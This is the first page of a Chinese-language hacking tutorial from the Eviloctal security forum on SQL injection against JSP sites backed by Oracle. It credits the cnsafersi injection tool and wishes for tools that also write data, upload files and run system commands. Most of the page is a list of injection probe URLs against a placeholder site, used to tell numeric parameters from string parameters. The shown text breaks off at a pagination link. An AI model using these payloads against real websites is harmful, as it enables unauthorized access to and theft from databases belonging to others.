文章作者:pt007&solaris7
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。
首先感谢华仔和他的朋友Hotkey为大家开发的cnsafersi 注入工具,没有这个工具就没有本文,HEHE,本文是对cnsafersi 注入工具抓包后所获得的数据进行了分析和整理,文章写的比较仓促,有不足之处欢迎同行指正。另外希望有高手开发出功能更加强大的JSP注入程序,cnsafersi目前仅有select的功能,建议新的JSP注入工具中能加入insert/delete/update/backup/上传/执行系统命令等功能,可以参考NBSI的功能进行开发。参考文章:《如何开发CnSaferSI》。
首先介绍本文中所使用的工具之JSP注入利器:华仔和他的朋友Hotkey开发的cnsafersi,关于使用方法近期我会写一个详细的使用教程:
下面以上图中的AD表为例来说明JSP+ORACLE注入的过程:
1、 判断注入类型(数字型还是字符型)
字符型和数字型数据判断:(希望有人能进一步的细化,细分为数字型和字符型判断两部分)
http://www.test.net/index_kaoyan_view.jsp?id=117 And user>char(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And user<char(0)
http://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117' And user<char(0) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117' And user>char(0) And '%25'='
http://www.test.net/index_kaoyan_view.jsp?id=117' And user<char(0) And '%25'='
http://www.test.net/index_kaoyan_view.jsp?id=117) And user>char(0) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117) And user<char(0) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117') And user>char(0) And (' ')=('
http://www.test.net/index_kaoyan_view.jsp?id=117') And user<char(0) And (' ')=('
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)>str(97)
http://www.test.net/index_kaoyan_view.jsp?id=117 And str(98)<str(97)
http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)<str(97) And '1'='1
http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)>str(97) And '%25'='
http://www.test.net/index_kaoyan_view.jsp?id=117' And user<char(0) And '%25'=
http://www.test.net/index_kaoyan_view.jsp?id=117' And str(98)<str(97) And '%25'='
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)>str(97) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117) And str(98)<str(97) And 1 in(1
http://www.test.net/index_kaoyan_view.jsp?id=117') And str(98)>str(97) And (' ')=('
http://www.test.net/index_kaoyan_view.jsp?id=117') And str(98)<str(97) And (' ')=('
出现正常的页面:
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER>CHR(0)
http://www.test.net/index_kaoyan_view.jsp?id=117 And USER<CHR(0)
[1] [2] [3] [4] 下一页